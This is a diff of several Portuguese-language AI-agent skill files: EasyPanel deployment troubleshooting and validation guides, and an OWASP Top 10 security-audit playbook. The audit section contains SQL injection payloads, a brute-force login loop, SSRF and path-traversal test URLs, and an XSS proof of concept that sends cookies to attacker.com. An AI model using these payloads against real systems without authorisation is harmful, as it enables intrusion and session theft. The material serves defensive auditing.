Fix: Update Dockerfile EXPOSE or Traefik label
```
### Missing Environment Variable
```
Pattern: "is not defined" / "undefined"
Fix: Add variable to EasyPanel environment
```
### Crash Loop
```
Pattern: Restart count > 3 in 10min
Fix: Check logs for root cause
```
### Database Connection
```
Pattern: "ECONNREFUSED" / "Connection refused"
Fix: Verify DATABASE_URL and network connectivity
```
### Memory Issues
```
Pattern: "out of memory" / "OOM killed"
Fix: Increase memory limit in docker-compose
```
## Output Format
```
🔍 EasyPanel Troubleshooting: <service-name>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 SERVICE STATUS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Container: <name>
Status: Running | Stopped | Restarting
Uptime: <time>
Restarts: <count> (last 10min)
Memory: X / Y MB
CPU: X%
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔴 ISSUES FOUND (X)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. 🔴 CRITICAL: <Issue Title>
Detected: <details>
Impact: <what breaks>
Fix:
<step-by-step solution>
2. ⚠️ WARNING: <Issue Title>
...
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📋 LOGS (Last 20 lines)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[timestamp] INFO: ...
[timestamp] ❌ ERROR: ...
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🛠️ RECOMMENDED ACTIONS (Prioritized)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. <Action 1>
2. <Action 2>
3. Redeploy: git commit + push
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔗 HELPFUL RESOURCES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
- Research: /media/ealmeida/Dados/Dev/Docs/EasyPanel-Deploy-Research/
- Checklist: CHECKLIST_EasyPanel_Deploy.md
- Templates: TEMPLATE_Dockerfile_NodeJS_MultiStage
```
## API Endpoints Usados
Ver skill `/easypanel-api` para documentação completa.
| Acção | Endpoint |
|-------|----------|
| Estado serviço | `GET services.app.inspectService` |
| Logs serviço | `GET services.app.getServiceLogs` |
| Listar projectos | `GET projects.listProjects` |
| Estatísticas monitor | `GET monitor.getStats` |
## MCPs Necessários
-`ssh-unified` - Acesso ao servidor para API e fallback
## Tools Necessários
```bash
# Via SSH
docker ps
docker logs <container> --tail 100
docker inspect <container>
curl https://<domain>/health
```
## Checklist Execução
- [ ] Conectar via SSH ao servidor EasyPanel
- [ ] Obter status do container (docker ps)
- [ ] Fetch logs (últimas 100 linhas)
- [ ] Parse errors automático (patterns conhecidos)
- [ ] Check health endpoint (curl)
- [ ] Verificar Traefik labels (docker inspect)
- [ ] Detectar port mismatch
- [ ] Verificar env vars (se possível)
- [ ] Gerar report estruturado
- [ ] Recomendar fixes priorizados
## Error Messages Database
### Common Patterns
| Pattern | Root Cause | Fix |
|---------|------------|-----|
| `EADDRINUSE :::PORT` | Port já em uso | Matar processo ou usar porta diferente |
| `Cannot find module 'X'` | Dependency missing | npm install no build |
| `ECONNREFUSED` | Database/service down | Verificar network/DATABASE_URL |
| `502 Bad Gateway` | App crash ou port mismatch | Check logs + ports |
| `MODULE_NOT_FOUND` | Build incorrecto | Verificar Dockerfile COPY |
| `OOM killed` | Memória insuficiente | Aumentar limite RAM |
## Security
- NUNCA expor credenciais nos logs
- Sanitizar env vars em output
- Limitar acesso SSH apenas ao necessário
## Performance
- Limitar logs a 100 linhas (evitar overflow)
- Cache de patterns conhecidos
- Timeout de 30s em curl health checks
---
**Versão:** 1.0.0 | **Autor:** Descomplicar® | **Data:** 2026-02-04
## Metadata (Desk CRM Task #65)
```
Tarefa: SKL: /easypanel-troubleshoot - Automated Diagnostics
Milestone: 294 (Skills Claude Code)
Tags: skill(79), stackworkflow(75), claude-code(81), activo(116)
Responsáveis: Emanuel(1), AikTop(25)
Status: 4 (Em progresso) → 5 (Concluído)
```
---
**/** @author Descomplicar® | @link descomplicar.pt | @copyright 2026 **/

365
infraestrutura/skills/easypanel-validate/SKILL.md Normal file
View File

@@ -0,0 +1,365 @@
---
name: easypanel-validate
description: Validate EasyPanel deployments and health checks via API oficial. Verifies services are
running correctly. Use when user mentions "easypanel validate", "verificar deploy",
"health check", "easypanel status", "deployment validation".
author: Descomplicar® Crescimento Digital
version: 2.0.0
quality_score: 70
user_invocable: true
desk_task: TBD
allowed-tools: Task
dependencies:
- easypanel-api
---
# EasyPanel Validate
Validação pré-deploy de projectos EasyPanel com auto-fix opcional.
## Quando Usar
- Antes de deploy (pre-flight check)
- Após criar novo projecto
- Para auditar projecto existente
- Quality gate antes de commit
- CI/CD validation step
## Sintaxe
```bash
/easypanel-validate [--fix] [--strict]
```
## Exemplos
```bash
# Validação sem correcções
/easypanel-validate
# Validação com auto-fix (cria ficheiros em falta)
/easypanel-validate --fix
# Modo strict (fail on warnings)
/easypanel-validate --strict
```
## Validation Checks (10 categorias)
### 1. Check Dockerfile
```bash
# Lint com hadolint (Docker best practices)
hadolint Dockerfile
```
**Checks:**
- ✅ Multi-stage build (>= 2 stages)
- ✅ FROM com versão específica (not :latest)
- ✅ HEALTHCHECK presente
- ✅ USER non-root
- ✅ EXPOSE port
- ⚠️ Warnings: npm install (usar npm ci), COPY . antes package.json
**Auto-fix (--fix):**
- Adicionar USER nodejs se ausente
- Adicionar HEALTHCHECK se ausente
- Sugerir multi-stage (não altera automaticamente)
### 2. Check .dockerignore
**Checks:**
- ✅ Existe
- ✅ Espelha .gitignore (node_modules, dist, .env)
- ❌ Se não existe → --fix: criar automaticamente
**Auto-fix (--fix):**
```
node_modules
dist
build
.env
.env.local
*.log
.git
.DS_Store
```
### 3. Check docker-compose.yml
**Checks:**
- ✅ Traefik labels presentes
- ✅ router.rule com domain
- ✅ service.loadbalancer.server.port match Dockerfile EXPOSE
- ✅ healthcheck.path configurado (/health)
- ⚠️ Warnings: certresolver não é letsencrypt, restart policy não definida
**Auto-fix (--fix):**
- Adicionar restart: unless-stopped
- Corrigir sintaxe de labels Traefik
### 4. Check package.json (Node.js)
**Checks:**
- ✅ Scripts: build, start, lint, test
- ✅ Dependencies: express/fastify (API framework)
- ⚠️ devDependencies em dependencies (bloat)
### 5. Check Health Endpoint
**Checks:**
- ✅ Ficheiro existe (src/routes/health.ts ou similar)
- ✅ GET /health implementado
- ❌ Se não existe → --fix: criar template
**Template Health Endpoint (Node.js/Express):**
```typescript
import { Router } from 'express'
const router = Router()
router.get('/health', (req, res) => {
res.status(200).json({
status: 'ok',
timestamp: new Date().toISOString(),
uptime: process.uptime()
})
})
export default router
```
### 6. Check .gitignore
**Checks:**
- ✅ node_modules
- ✅ dist/build
- ✅ .env (não .env.example)
- ✅ logs/
### 7. Check .env.example
**Checks:**
- ✅ Existe (template para .env)
- ✅ Todas vars documentadas
- ⚠️ Valores default sensíveis (passwords)
### 8. Check CI/CD
**Checks:**
- ✅ .gitea/workflows/deploy.yml existe
- ✅ Webhook URL configurado (secret)
- ⚠️ Tests não rodando (npm test ausente)
**Auto-fix (--fix):**
- Criar .gitea/workflows/deploy.yml usando template
### 9. Test Local Build
```bash
docker build --no-cache -t test:validate .
```
**Checks:**
- Build completa sem erros
- Image size < 200MB (Node.js)
- Image size > 200MB (optimizar multi-stage)
### 10. Validar Serviço via API (se já deployed)
```bash
# Obter token
TOKEN=$(cat /etc/easypanel/.api-token)
# Verificar estado do serviço existente
curl -s "http://localhost:3000/api/trpc/services.app.inspectService?input=$(echo -n '{"json":{"projectName":"PROJECT","serviceName":"SERVICE"}}' | jq -sRr @uri)" \
-H "Authorization: Bearer $TOKEN" | jq '.result.data.json'
# Verificar estatísticas de recursos
curl -s "http://localhost:3000/api/trpc/monitor.getStats" \
-H "Authorization: Bearer $TOKEN"
```
### 11. Output Report
**Score: X/10**
- Cada categoria = 1 ponto
- Critical issues = 0 pontos
- Warnings = 0.5 pontos
## Output Format
```
🔍 EasyPanel Deploy Validation
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 SCORE: X/10 (EXCELLENT | GOOD | FAIR | POOR)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ PASSED (X)
1. Dockerfile: Multi-stage build
2. docker-compose.yml: Traefik configured
...
⚠️ WARNINGS (X)
1. Dockerfile: Use 'npm ci' instead of 'npm install'
2. docker-compose.yml: Missing restart policy
...
❌ CRITICAL (X)
1. .dockerignore: FILE MISSING
→ Impact: Build includes unnecessary files
→ Fix: Create .dockerignore
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔧 AUTO-FIXES (--fix flag detected)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ Created .dockerignore
✅ Updated docker-compose.yml: Added restart policy
✅ Dockerfile: Changed npm install → npm ci
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📋 RECOMMENDATIONS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. Add .gitea/workflows/deploy.yml for CI/CD
2. Implement integration tests
3. Consider Prometheus metrics endpoint (/metrics)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ READY TO DEPLOY (score >= 7/10)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Next: /easypanel-deploy or git push origin main
```
## Score Interpretation
| Score | Status | Action |
|-------|--------|--------|
| 9-10 | EXCELLENT | Deploy com confiança |
| 7-8 | GOOD | Deploy OK, resolver warnings depois |
| 5-6 | FAIR | Resolver critical issues antes de deploy |
| 0-4 | POOR | BLOCKER - Não deploy até corrigir |
## Strict Mode (--strict)
Se `--strict`:
- Warnings são tratados como CRITICAL
- Score mínimo para pass: 9/10
- Exit code 1 se score < 9
Uso em CI/CD:
```yaml
- name: Validate
run: /easypanel-validate --strict
```
## Auto-Fix Capabilities
| Issue | Auto-Fix? | Action |
|-------|-----------|--------|
| .dockerignore missing | ✅ Yes | Create from template |
| .gitignore incomplete | ✅ Yes | Append missing entries |
| docker-compose restart policy | ✅ Yes | Add unless-stopped |
| Health endpoint missing | ✅ Yes | Create template file |
| Dockerfile npm install | ✅ Yes | Replace with npm ci |
| Multi-stage missing | ❌ No | Recommend only |
| Port mismatch | ❌ No | Report only |
## API Endpoints Usados
Ver skill `/easypanel-api` para documentação completa.
| Acção | Endpoint |
|-------|----------|
| Inspeccionar serviço | `GET services.app.inspectService` |
| Estatísticas monitor | `GET monitor.getStats` |
| Listar projectos | `GET projects.listProjects` |
| Estado do sistema | `GET settings.getSystemInfo` |
## Tools Necessários
```bash
# Docker para build test
docker build --no-cache -t test .
# hadolint para Dockerfile lint (opcional)
hadolint Dockerfile
```
## Integration com CI/CD
```yaml
# .gitea/workflows/deploy.yml
steps:
- name: Validate
run: /easypanel-validate --strict
- name: Deploy
if: success()
run: /easypanel-deploy
```
## Checklist Execução
- [ ] Verificar Dockerfile existe
- [ ] Lint Dockerfile (hadolint ou manual)
- [ ] Check .dockerignore
- [ ] Validar docker-compose.yml
- [ ] Verificar package.json (se Node.js)
- [ ] Check health endpoint
- [ ] Validar .gitignore
- [ ] Check .env.example
- [ ] Verificar CI/CD config
- [ ] Test local build (docker build)
- [ ] Calcular score
- [ ] Apply auto-fixes (se --fix)
- [ ] Gerar report
## Templates Disponíveis
Usar templates de:
`/media/ealmeida/Dados/Dev/Docs/EasyPanel-Deploy-Research/`
- TEMPLATE_Dockerfile_NodeJS_MultiStage
- TEMPLATE_docker-compose.yml
- TEMPLATE_gitea-workflow-deploy.yml
- TEMPLATE_health-endpoint.ts
---
**Versão:** 1.0.0 | **Autor:** Descomplicar® | **Data:** 2026-02-04
## Metadata (Desk CRM Task #65)
```
Tarefa: SKL: /easypanel-validate - Pre-deploy Validation
Milestone: 294 (Skills Claude Code)
Tags: skill(79), stackworkflow(75), claude-code(81), activo(116)
Responsáveis: Emanuel(1), AikTop(25)
Status: 4 (Em progresso) → 5 (Concluído)
```
---
**/** @author Descomplicar® | @link descomplicar.pt | @copyright 2026 **/
---
## Quando NÃO Usar
- Para tarefas fora do domínio de especialização desta skill
- Quando outra skill mais específica está disponível
- Para operações que requerem confirmação manual do utilizador
## Protocolo
1. Analisar requisitos da tarefa
2. Verificar disponibilidade de ferramentas necessárias
3. Executar operações de forma incremental
4. Validar resultados antes de concluir
5. Reportar status e próximos passos

1123
infraestrutura/skills/mcp-dev/SKILL.md Normal file
View File

File diff suppressed because it is too large Load Diff

802
infraestrutura/skills/security-audit/SKILL.md Normal file
View File

@@ -0,0 +1,802 @@
---
name: security-audit
description: Security audit for web applications and servers. Identifies vulnerabilities,
misconfigurations, and provides hardening recommendations. Use when user mentions
"security audit", "auditoria segurança", "vulnerabilities", "security scan", "penetration
test".
author: Descomplicar® Crescimento Digital
version: 2.0.0
quality_score: 75
user_invocable: true
desk_task: 1480
allowed-tools: Glob
---
# /security-audit - Security Compliance Specialist
Auditoria de segurança seguindo padrões OWASP Top 10, GDPR e best practices Descomplicar®.
---
## Quando Usar
- Auditar código para vulnerabilidades
- Verificar configurações de segurança servidor
- Avaliar compliance GDPR/ISO
- Security review de aplicações
- Análise de logs de segurança
- Pentest básico (ethical hacking)
- Hardening de servidor/aplicação
---
## Protocolo Obrigatório
### 1. Pesquisa Inicial (SEMPRE)
```javascript
// Antes de qualquer audit, consultar histórico
await mcp__memory-supabase__search_memories({
query: "security vulnerabilidade [sistema/projecto]",
limit: 5
});
await mcp__wikijs__search_pages({
query: "security policy compliance"
});
```
### 2. Verificar Contexto
- [ ] Vulnerabilidades anteriores no sistema
- [ ] Incidentes de segurança passados
- [ ] Políticas de segurança existentes
- [ ] Compliance requirements (GDPR, ISO, etc.)
- [ ] Stack tecnológico e versões
---
## OWASP Top 10 (Checklist Obrigatória)
### A01 - Broken Access Control
**Verificações:**
```php
// ❌ VULNERÁVEL
if ($_GET['user_id']) {
$user = getUserById($_GET['user_id']); // Sem verificação ownership
showUserData($user);
}
// ✅ SEGURO
if ($_GET['user_id']) {
$user = getUserById($_GET['user_id']);
if ($user->id !== $currentUser->id && !$currentUser->isAdmin()) {
die('Unauthorized');
}
showUserData($user);
}
```
**Testes:**
- [ ] Tentar aceder recurso de outro user (`/user/123``/user/124`)
- [ ] Testar IDOR (Insecure Direct Object Reference)
- [ ] Verificar se RBAC implementado correctamente
- [ ] Path traversal (`../../../etc/passwd`)
- [ ] Forced browsing (aceder `/admin` sem autenticação)
### A02 - Cryptographic Failures
**Verificações:**
```php
// ❌ VULNERÁVEL
$password = md5($_POST['password']); // MD5 é inseguro
// ✅ SEGURO
$password = password_hash($_POST['password'], PASSWORD_BCRYPT);
```
**Checklist:**
- [ ] Passwords com bcrypt/argon2 (não MD5/SHA1)
- [ ] Dados sensíveis encriptados em BD
- [ ] HTTPS em produção (não HTTP)
- [ ] Cookies com flags `Secure` e `HttpOnly`
- [ ] Sem PII em logs
**Testes:**
```bash
# Verificar HTTPS
curl -I https://site.com | grep -i "strict-transport-security"
# Verificar cookies
curl -I https://site.com | grep -i "set-cookie"
# Deve ter: Secure; HttpOnly; SameSite=Strict
```
### A03 - Injection (SQL, Command, LDAP)
**Verificações SQL Injection:**
```php
// ❌ VULNERÁVEL
$sql = "SELECT * FROM users WHERE id = " . $_GET['id'];
// ✅ SEGURO (Prepared Statements)
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
$stmt->execute([$_GET['id']]);
```
**Testes:**
```sql
-- Payloads comuns
' OR '1'='1
'; DROP TABLE users; --
' UNION SELECT NULL, NULL, NULL--
```
**Command Injection:**
```php
// ❌ VULNERÁVEL
system("ping " . $_GET['host']);
// ✅ SEGURO
$host = escapeshellarg($_GET['host']);
system("ping $host");
```
**Checklist:**
- [ ] Prepared statements em todas as queries
- [ ] Input sanitizado antes de shell commands
- [ ] NoSQL injection prevenido (MongoDB, etc.)
- [ ] LDAP injection prevenido
- [ ] Template injection prevenido (Twig, Smarty)
### A04 - Insecure Design
**Verificações:**
- [ ] Rate limiting implementado (login, API)
- [ ] CAPTCHA em formulários públicos
- [ ] MFA disponível para contas admin
- [ ] Session timeout configurado
- [ ] Password policy forte (min 8 chars, uppercase, etc.)
**Testes:**
```bash
# Testar rate limiting
for i in {1..100}; do
curl -X POST https://site.com/login \
-d "email=test@test.com&password=wrong" &
done
# Deve bloquear após N tentativas
```
### A05 - Security Misconfiguration
**Checklist Servidor:**
```bash
# Verificar versões expostas
curl -I https://site.com | grep -i "server:"
# Não deve revelar Apache/2.4.41 ou PHP/8.1.2
# Verificar directory listing
curl https://site.com/uploads/
# Não deve listar ficheiros
# Verificar ficheiros sensíveis expostos
curl https://site.com/.env
curl https://site.com/.git/config
curl https://site.com/phpinfo.php
# Todos devem dar 403/404
```
**Headers de Segurança:**
```bash
# Verificar headers obrigatórios
curl -I https://site.com | grep -E "X-Frame-Options|X-Content-Type-Options|Content-Security-Policy|Strict-Transport-Security"
```
**Configuração Correcta:**
```nginx
# Nginx - Security Headers
add_header X-Frame-Options "SAMEORIGIN" always;
add_header X-Content-Type-Options "nosniff" always;
add_header X-XSS-Protection "1; mode=block" always;
add_header Referrer-Policy "no-referrer-when-downgrade" always;
add_header Content-Security-Policy "default-src 'self' https:; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'" always;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
# Desactivar server tokens
server_tokens off;
```
### A06 - Vulnerable and Outdated Components
**Verificações:**
```bash
# PHP - Composer
composer audit
# Node.js
npm audit
# WordPress
wp core version
wp plugin list --format=json | jq '.[] | select(.update=="available")'
# Verificar CVEs conhecidos
curl https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress+plugin+NAME
```
**Checklist:**
- [ ] Dependências actualizadas (últimos 3 meses)
- [ ] Sem bibliotecas com vulnerabilidades conhecidas
- [ ] PHP/Node/Python versão suportada
- [ ] WordPress core e plugins actualizados
### A07 - Identification and Authentication Failures
**Verificações:**
```php
// ❌ VULNERÁVEL - Session Fixation
session_start();
// ✅ SEGURO
session_start();
session_regenerate_id(true); // Regenerar após login
```
**Checklist:**
- [ ] Session regenerate após login
- [ ] Logout invalida sessão no servidor
- [ ] Session timeout (15-30 min)
- [ ] Password reset com token expirável
- [ ] Account lockout após N tentativas falhadas
- [ ] Sem user enum (login não revela se user existe)
**Testes:**
```bash
# Testar user enumeration
curl -X POST https://site.com/login \
-d "email=naoexiste@test.com&password=wrong"
# Não deve dizer "user não existe"
# Testar session fixation
# 1. Obter PHPSESSID
# 2. Fazer login
# 3. Verificar se PHPSESSID mudou (deve mudar)
```
### A08 - Software and Data Integrity Failures
**Verificações:**
```php
// ❌ VULNERÁVEL - Insecure Deserialization
$data = unserialize($_GET['data']);
// ✅ SEGURO
$data = json_decode($_GET['data'], true);
```
**Checklist:**
- [ ] Evitar `unserialize()` de input user
- [ ] Verificar integridade de updates (signatures)
- [ ] CI/CD com verificação de dependências
- [ ] Subresource Integrity (SRI) em CDNs
**SRI Example:**
```html
<script src="https://cdn.example.com/lib.js"
integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/ux..."
crossorigin="anonymous"></script>
```
### A09 - Security Logging and Monitoring Failures
**Checklist:**
- [ ] Login attempts logged (success/fail)
- [ ] Access to sensitive data logged
- [ ] Input validation failures logged
- [ ] Logs não contêm passwords ou PII
- [ ] Alertas configurados para actividade suspeita
- [ ] Retenção de logs (mínimo 90 dias)
**Logs Essenciais:**
```bash
# Nginx access log
tail -f /var/log/nginx/access.log
# PHP error log
tail -f /var/log/php/error.log
# MySQL slow query log
tail -f /var/log/mysql/slow.log
# Fail2ban log
tail -f /var/log/fail2ban.log
```
**Análise de Logs:**
```bash
# Tentativas de SQL injection
grep -i "union.*select" /var/log/nginx/access.log
# Tentativas de path traversal
grep -E "\.\./|\.\.%2F" /var/log/nginx/access.log
# Scans de vulnerabilidades
grep -E "nikto|nmap|sqlmap" /var/log/nginx/access.log
# Tentativas de login falhadas
grep "Failed password" /var/log/secure
```
### A10 - Server-Side Request Forgery (SSRF)
**Verificações:**
```php
// ❌ VULNERÁVEL
$url = $_GET['url'];
file_get_contents($url); // Pode aceder rede interna
// ✅ SEGURO
$url = $_GET['url'];
$parsed = parse_url($url);
if ($parsed['host'] !== 'allowed-domain.com') {
die('Invalid URL');
}
// Whitelist de domínios permitidos
```
**Testes:**
```bash
# Tentar aceder localhost
curl "https://site.com/fetch?url=http://localhost/admin"
# Tentar aceder rede interna
curl "https://site.com/fetch?url=http://192.168.1.1"
```
---
## Severidade de Findings
```
🔴 CRÍTICO (Score 9-10)
Exploração imediata possível, dados em risco
RCE, SQL Injection, Authentication Bypass
→ Corrigir IMEDIATAMENTE (<24h)
🟠 ALTO (Score 7-8.9)
Vulnerabilidade significativa
XSS Stored, CSRF, Insecure Deserialization
→ Corrigir em 24-48h
🟡 MÉDIO (Score 4-6.9)
Risco moderado
XSS Reflected, Information Disclosure, Missing Headers
→ Corrigir em 7 dias
🟢 BAIXO (Score 1-3.9)
Melhoria recomendada
Weak Password Policy, Verbose Errors, Outdated Libraries
→ Corrigir em 30 dias
```
**Cálculo CVSS v3:** https://www.first.org/cvss/calculator/3.1
---
## Template Relatório de Segurança
```markdown
# 🔒 RELATÓRIO DE SEGURANÇA
**Sistema:** [Nome do Sistema/Aplicação]
**Data:** [YYYY-MM-DD]
**Auditor:** Security Compliance Specialist - Descomplicar®
**Scope:** [Frontend | Backend | Infra | Full Stack]
---
## EXECUTIVE SUMMARY
[2-3 parágrafos resumindo estado de segurança global]
**Score Global:** [X]/100
**CVSS Médio:** [X.X]
**Breakdown:**
- 🔴 Críticos: [N] findings
- 🟠 Altos: [N] findings
- 🟡 Médios: [N] findings
- 🟢 Baixos: [N] findings
---
## FINDINGS
### 🔴 CRÍTICOS ([N] findings)
#### FINDING-001: SQL Injection em Login
- **Severidade:** CRÍTICO (CVSS 9.8)
- **Componente:** `login.php` linha 45
- **Categoria OWASP:** A03 - Injection
**Descrição:**
Parâmetro `username` não sanitizado, permitindo SQL injection.
**Evidência:**
```php
// Código vulnerável (login.php:45)
$sql = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "'";
```
**Proof of Concept:**
```bash
curl -X POST https://site.com/login \
-d "username=' OR '1'='1&password=anything"
# Resultado: acesso sem password
```
**Impacto:**
- Acesso total à base de dados
- Bypass de autenticação
- Exfiltração de dados de clientes
- Possível RCE via `INTO OUTFILE`
**Remediação:**
```php
// Usar prepared statements
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$_POST['username']]);
```
**Prazo:** IMEDIATO (fix em produção hoje)
**Status:** 🔴 OPEN
---
### 🟠 ALTOS ([N] findings)
#### FINDING-002: XSS Stored em Comentários
- **Severidade:** ALTO (CVSS 7.2)
- **Componente:** `comments.php`
- **Categoria OWASP:** A03 - Injection (XSS)
**Descrição:**
Input de comentários não escapa output, permitindo XSS persistente.
**Evidência:**
```html
<!-- Código vulnerável -->
<div class="comment">
<?php echo $comment->text; ?>
</div>
```
**Proof of Concept:**
```html
<script>
fetch('https://attacker.com/steal?cookie='+document.cookie)
</script>
```
**Impacto:**
- Session hijacking
- Phishing de utilizadores
- Defacement
**Remediação:**
```php
// Escapar output
<div class="comment">
<?php echo htmlspecialchars($comment->text, ENT_QUOTES, 'UTF-8'); ?>
</div>
```
**Prazo:** 24-48h
**Status:** 🟠 OPEN
---
### 🟡 MÉDIOS ([N] findings)
[Mesmo formato]
---
### 🟢 BAIXOS ([N] findings)
[Mesmo formato]
---
## OWASP TOP 10 COMPLIANCE
| # | Categoria | Status | Findings |
|---|-----------|--------|----------|
| A01 | Broken Access Control | 🟡 Parcial | 2 médios |
| A02 | Cryptographic Failures | ✅ OK | 0 |
| A03 | Injection | 🔴 Falha | 1 crítico, 1 alto |
| A04 | Insecure Design | 🟡 Parcial | 1 médio |
| A05 | Security Misconfiguration | 🟠 Atenção | 3 altos |
| A06 | Vulnerable Components | 🟡 Parcial | 5 baixos |
| A07 | Auth Failures | ✅ OK | 0 |
| A08 | Data Integrity | ✅ OK | 0 |
| A09 | Logging Failures | 🟡 Parcial | 1 médio |
| A10 | SSRF | ✅ OK | 0 |
---
## RECOMENDAÇÕES PRIORITIZADAS
### 🔴 URGENTE (Hoje)
1. **FINDING-001:** Corrigir SQL Injection em login.php
2. **FINDING-XXX:** ...
### 🟠 IMPORTANTE (Esta Semana)
3. **FINDING-002:** Corrigir XSS em comentários
4. **FINDING-XXX:** ...
### 🟡 MELHORIAS (Este Mês)
5. **FINDING-XXX:** ...
---
## PLANO DE REMEDIAÇÃO
| Finding | Responsável | Prazo | Status |
|---------|-------------|-------|--------|
| FINDING-001 | Dev Team | 2026-02-03 | 🔴 OPEN |
| FINDING-002 | Dev Team | 2026-02-05 | 🟠 OPEN |
| ... | ... | ... | ... |
---
## COMPLIANCE GDPR
- [ ] ✅ Consentimento explícito capturado
- [ ] ✅ Direito ao esquecimento implementado
- [ ] ✅ Portabilidade de dados possível
- [ ] ⚠️ Retenção de dados definida (parcial)
- [ ] ✅ Encriptação de dados sensíveis
- [ ] ✅ Logging de acessos activo
- [ ] N/A DPO designado (não aplicável)
- [ ] ⚠️ Privacy policy actualizada (desactualizada)
**Score GDPR:** 75/100 (Parcialmente Conforme)
---
## FERRAMENTAS UTILIZADAS
- OWASP ZAP (Automated Scan)
- Manual Code Review
- Burp Suite Community
- SQLMap (SQL Injection)
- XSStrike (XSS Testing)
- Nmap (Port Scanning)
- Nikto (Web Server Scan)
---
## CONCLUSÃO
[Resumo executivo, estado global, próximos passos]
---
**Confidencial - Descomplicar® Crescimento Digital**
**Para uso interno e do cliente apenas**
```
---
## Checklist GDPR Completo
### Consentimento
- [ ] Opt-in explícito (não pré-seleccionado)
- [ ] Linguagem clara (não juridiquês)
- [ ] Granular (aceitar newsletter ≠ aceitar tracking)
- [ ] Fácil de retirar (mesma facilidade)
### Direitos do Titular
- [ ] Direito ao acesso (exportar dados)
- [ ] Direito à rectificação (editar dados)
- [ ] Direito ao esquecimento (delete account)
- [ ] Direito à portabilidade (formato standard)
- [ ] Direito à oposição (opt-out processing)
### Segurança
- [ ] Encriptação em trânsito (HTTPS)
- [ ] Encriptação em repouso (BD sensível)
- [ ] Passwords com hash forte (bcrypt)
- [ ] Logs de acesso a dados pessoais
- [ ] Notificação de breach (<72h)
### Documentação
- [ ] Privacy policy actualizada (última 12 meses)
- [ ] Cookie policy clara
- [ ] Terms of service
- [ ] Data processing agreement (DPA)
---
## Ferramentas de Análise
### Análise Estática (SAST)
```bash
# PHP - PHPStan
phpstan analyse --level=max src/
# PHP - Psalm
psalm --show-info=true
# PHP - Security Checker
local-php-security-checker
# JavaScript - ESLint
eslint --ext .js,.jsx src/
# Python - Bandit
bandit -r project/
```
### Análise Dinâmica (DAST)
```bash
# OWASP ZAP (headless)
zap-cli quick-scan -s all https://site.com
# Nikto
nikto -h https://site.com
# SQLMap
sqlmap -u "https://site.com/page?id=1" --batch
# Nmap
nmap -sV -sC site.com
# WPScan (WordPress)
wpscan --url https://site.com --api-token YOUR_TOKEN
```
### Headers HTTP
```bash
# Verificar headers de segurança
curl -I https://site.com | grep -E "X-|Content-Security|Strict-Transport"
# SSL Labs
curl "https://api.ssllabs.com/api/v3/analyze?host=site.com"
```
---
## Hardening Checklist
### Sistema Operativo (Linux)
- [ ] Firewall activo (iptables/firewalld)
- [ ] SELinux/AppArmor activado
- [ ] SSH com key-based auth (não password)
- [ ] SSH não permite root login
- [ ] Fail2ban instalado e configurado
- [ ] Automatic security updates
- [ ] Portas desnecessárias fechadas
### Web Server (Nginx/Apache)
- [ ] Server tokens desactivado
- [ ] Directory listing desactivado
- [ ] Security headers configurados
- [ ] SSL/TLS configurado (A+ SSL Labs)
- [ ] Apenas TLS 1.2+ (não SSL, TLS 1.0, 1.1)
- [ ] HTTP/2 activado
- [ ] Gzip/Brotli compression
### PHP
- [ ] `display_errors = Off` em produção
- [ ] `expose_php = Off`
- [ ] `open_basedir` configurado
- [ ] `disable_functions` configurado
- [ ] File uploads limitados
- [ ] Memory limit apropriado
- [ ] OPcache activado
### MySQL
- [ ] Bind apenas localhost (se possível)
- [ ] Root sem acesso remoto
- [ ] Passwords fortes
- [ ] `skip-name-resolve`
- [ ] Slow query log activado
- [ ] Binary logs com retenção definida
---
## Confidencialidade
**CRÍTICO:**
- **NUNCA** expor credenciais em relatórios
- **MASCARAR** dados sensíveis (`email: *****@domain.com`)
- **RESTRINGIR** relatórios a stakeholders autorizados
- **ELIMINAR** ficheiros temporários após análise
- **ENCRIPTAR** relatórios se enviados por email
---
## Datasets Dify (Consulta Obrigatória)
Consultar para conhecimento aprofundado ou casos específicos:
| Dataset | ID | Uso |
|---------|----|----|
| **TI (Tecnologia da Informação)** | `7f63ec0c-6321-488c-b107-980140199850` | Best practices gerais |
| **Linux** | `bde4eddd-4618-402c-8bfb-bb947ed9219d` | Hardening Linux |
| **AWS (Amazon Web Services)** | `cc7f000a-ad86-49b6-b59b-179e65f8a229` | Segurança cloud |
| **CWP Centos Web Panel** | `b2a4d2c5-fe55-412c-bc28-74dbd611905d` | Hardening CWP |
